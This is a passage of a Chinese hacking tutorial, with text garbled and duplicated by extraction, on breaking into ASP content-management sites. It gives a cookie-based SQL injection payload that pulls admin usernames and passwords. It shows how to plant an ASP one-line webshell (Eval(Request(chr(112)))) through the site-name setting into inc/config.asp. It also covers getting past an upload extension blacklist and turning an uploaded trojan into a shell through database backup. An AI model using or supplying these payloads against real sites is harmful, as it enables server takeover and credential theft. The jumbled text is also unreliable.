提交: 清空地址栏,利用 union 语句来注入,提交: javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,pass
word,4,5,6,7,8,9,10 from Admin")) 如果你牛你就手工,反正我是不会,用刺猬大哥的“ 注入转换工具” 如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie 注入转换工具”方便又迅速何 乐而不为? 乐而不为? 注入。 注:貌似南方数据、良精系统、网软天下等系统也都存在 COOKIE 注入。 貌似南方数据、良精系统、 (当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我
常用的总结出来 当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用, 希望对大家有帮助) 希望对大家有帮助) 后台取 SHELL 方法总结 在
系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理” 在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再 点击”网站配置”在右边的”网站名称” 也可以在其它处) 点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入 "%><%Eval(Request(chr(112)))%><%’ 再点保存配置,如图: "%><%Eval(Request(chr(112)))%><%’ 再点保存配置,如图: , 文件,看到一句话马已写入到配置文件中了, 然后我们打开
inc/config.asp 文件,看到一句话马已写入到配置文件中了, 这时再打开一句话马的客户端, 这时再打开一句话马的客户端,提交同样得到一个小马 (注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!) 以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解! 后台上传漏洞, 文件中部分代码片段如下: 后台上传漏洞,在 Upfile_Photo.asp 文件中部分代码片段如下: iffileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then EnableUpload=false end if
ifEnableUpload=false then msg="这种文件类型不允许上传 nn 只允许上传这几种文件类型: 这种文件类型不允许上传! msg="这种文件类型不允许上传! 只允许上传这几种文件类型: &;UpFileType " &;UpFileType FoundErr=true end if 大家可以看到程序只限制了对"asp", 网站配置” 大家可以看到
程序只限制了对"asp", "asp" "asa","aspx"类的文件上传, "asa","aspx"类的文件上传, 类的文件上传 我们只要在” 我们只要在” 网站配置” 的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图: 的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求( 提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只 能说运气不好吧) 能说运气不好吧) 后台备份,直接在”产品管理” 再到” 后台备份,直接在”产品管理”下的添加产品中上传 jpg 后缀的 asp 马,再到”系 统管理”下的数据库备份, 当前数据库路径”栏填入上传的路径, 统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数 据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa 据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa 的 点”确定”后提示”备份数据库成功….”不